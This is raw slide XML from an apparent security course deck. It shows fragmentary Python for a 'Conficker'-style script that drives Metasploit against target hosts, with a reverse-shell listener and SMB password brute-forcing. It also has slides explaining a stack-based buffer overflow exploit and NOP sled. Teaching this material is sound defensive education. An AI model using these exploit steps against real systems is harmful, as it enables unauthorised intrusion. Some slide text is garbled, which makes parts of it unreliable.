                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="98C379"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>'set LHOST </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="D19A66"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="E06C75"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>lhost</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="D19A66"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>}</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config_file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write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'exploit -j -z</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="56B6C2"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>\n</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="98C379"/>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g1fe188b01e2_0_9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Writing Own Conflicker</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="776" name="Google Shape;776;g1fe188b01e2_0_97"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="375975" y="2080175"/>
            <a:ext cx="11183400" cy="4700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__name__</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'__main__'</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with</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open</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'meta.rc'</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'w'</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as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metarc_file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argparse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ArgumentParser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usage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'python conficker.py TARGET_HOST[S] -l LHOST'</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'[-p LPORT -f PASSWORD_FILE]'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add_argument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'tgt_hosts'</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type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metavar</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'TARGET_HOST[S]'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help</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'specify the target host[s] address[es] '</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1600" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="98C379"/>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98C379"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>'separated by commas (no spaces'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add_argument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'-l'</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type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metavar</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'LHOST'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required</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True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help</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'specify the address of the listener'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add_argument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'-p'</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type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int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metavar</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'LPORT'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default</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D19A66"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>1337</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help</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'specify the port used by the listener'</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add_argument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'-f'</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type</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E5C07B"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>str</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metavar</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'PASSWORD_FILE'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E06C75"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>help</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'password file for SMB brute-force attempt'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g1fe188b01e2_0_103"/>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Writing Own Conflicker</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="782" name="Google Shape;782;g1fe188b01e2_0_103"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="375975" y="2080175"/>
            <a:ext cx="11183400" cy="4700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parser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parse_args</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tgt_list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find_tgts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.tgt_hosts)</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.l</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l_port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.p</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pass_file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56B6C2"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a: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args</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>.f</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setup_handler</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metarc_file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l_port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for</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in</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tgt_list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conficker_exploit</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metarc_file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l_port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1" lang="en-US" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="C678DD"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>if</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pass_file</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61AFEF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>smb_brute</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E06C75"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>metarc_file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tgt_host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pass_file</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l_host</a:t>
            </a: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06C75"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>l_port</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1600" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ABB2BF"/>
              </a:solidFill>
              <a:highlight>
                <a:schemeClr val="dk1"/>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US" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="E5C07B"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>os</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61AFEF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>system</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="98C379"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>'msfconsole -r meta.rc'</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr b="0" i="1" sz="1600" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="C678DD"/>
              </a:solidFill>
              <a:highlight>
                <a:schemeClr val="dk1"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>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g1e9a65c21fa_51_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="148371" y="8596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Stack-Based Buffer Overflow Attacks</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3200"/>
            </a:br>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="788" name="Google Shape;788;g1e9a65c21fa_51_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="680326" y="2336875"/>
            <a:ext cx="11226600" cy="3599400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-340360" lvl="0" marL="354331" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>In the case of a stack-based buffer overflow, unchecked user data overwrites the next instruction pointer [FIP] to take control of a program's flow. The exploit directs the EIP register to point to a location containing shellcode inserted by the attacker. </a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-340360" lvl="0" marL="354331" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>A series of machine code instructions, shellcode, can allow the exploit to add an additional user on to the target system, make a network connection with the attacker, or download a stand-alone executable</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-340360" lvl="0" marL="354331" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>While many methods for writing exploits exist today stack-based buffer over flows provided the original exploit vector, flowever, an abundance of these exploits exist today and continue to grow in laly of 2011, an acquaintance of mine posted an exploit for a vulnerable FTP server to packetstorm (Freyman, 2011). </a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-340360" lvl="0" marL="354331" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Although the development of the exploit may appear to be a complex task, the actual attack contains less than eighty lines of code (including about thirty lines of shell code).</a:t>
            </a:r>
            <a:endParaRPr sz="2000">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g1e9a65c21fa_51_6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="148371" y="8596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Stack-Based Buffer Overflow Attacks</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3200"/>
            </a:br>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="794" name="Google Shape;794;g1e9a65c21fa_51_6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="148371" y="3008084"/>
            <a:ext cx="11291720" cy="3599400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="354331" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>This passage is describing a type of computer security exploit known as a stack-based buffer overflow. </a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="354331" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>In this type of exploit, the attacker is able to cause the program to overwrite data in a specific area of memory called the stack, which can allow them to take control of the program's flow of execution. </a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="354331" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>This is typically achieved by sending the program more data than it is expecting, which causes the data to overwrite the next instruction pointer (FIP) and redirect the program's execution to a location specified by the attacker. </a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="795" name="Google Shape;795;g1e9a65c21fa_51_6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="148371" y="2185381"/>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g1e9a65c21fa_51_12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="148371" y="8596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Stack-Based Buffer Overflow Attacks</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3200"/>
            </a:br>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="801" name="Google Shape;801;g1e9a65c21fa_51_12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="148371" y="2136811"/>
            <a:ext cx="11291720" cy="3599400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="354331" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>This location typically contains shellcode, which is a series of machine code instructions that the attacker has inserted to perform a specific action, such as adding a new user to the system, connecting to the attacker's network, or downloading a stand-alone executable. </a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="354331" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The passage also mentions that stack-based buffer overflows were one of the original exploit vectors, but many other methods for writing exploits have been developed since then. </a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="354331" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>It also mentions that the exploit code is simple, less than 80 lines of code, including about 30 lines of shellcode.</a:t>
            </a:r>
            <a:endParaRPr>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g1e9a65c21fa_51_17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="148371" y="9987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Adding the Key Elements of the Attack</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3200"/>
            </a:br>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="807" name="Google Shape;807;g1e9a65c21fa_51_17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="680326" y="2336875"/>
            <a:ext cx="11226600" cy="3599400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-336550" lvl="0" marL="361950" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> Let's begin by building the key elements of our exploit first we set our shell code variable to contain the hexadecimal encoding for payload we created with the Metasploit Framework.</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-336550" lvl="0" marL="361950" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> Next, we set our overflow variable to contain 246 instances of the letter "A" (\x41 in hex)Our return address variable points to an address location in kernel32.dll containing an instruction that jumps directly to the top of the stack. Our padding variable contains a series of 150 NOP instructions.</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-336550" lvl="0" marL="361950" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> This builds our NOP-sled. Finally, we assemble all of these variables together into a variable we call crash.</a:t>
            </a:r>
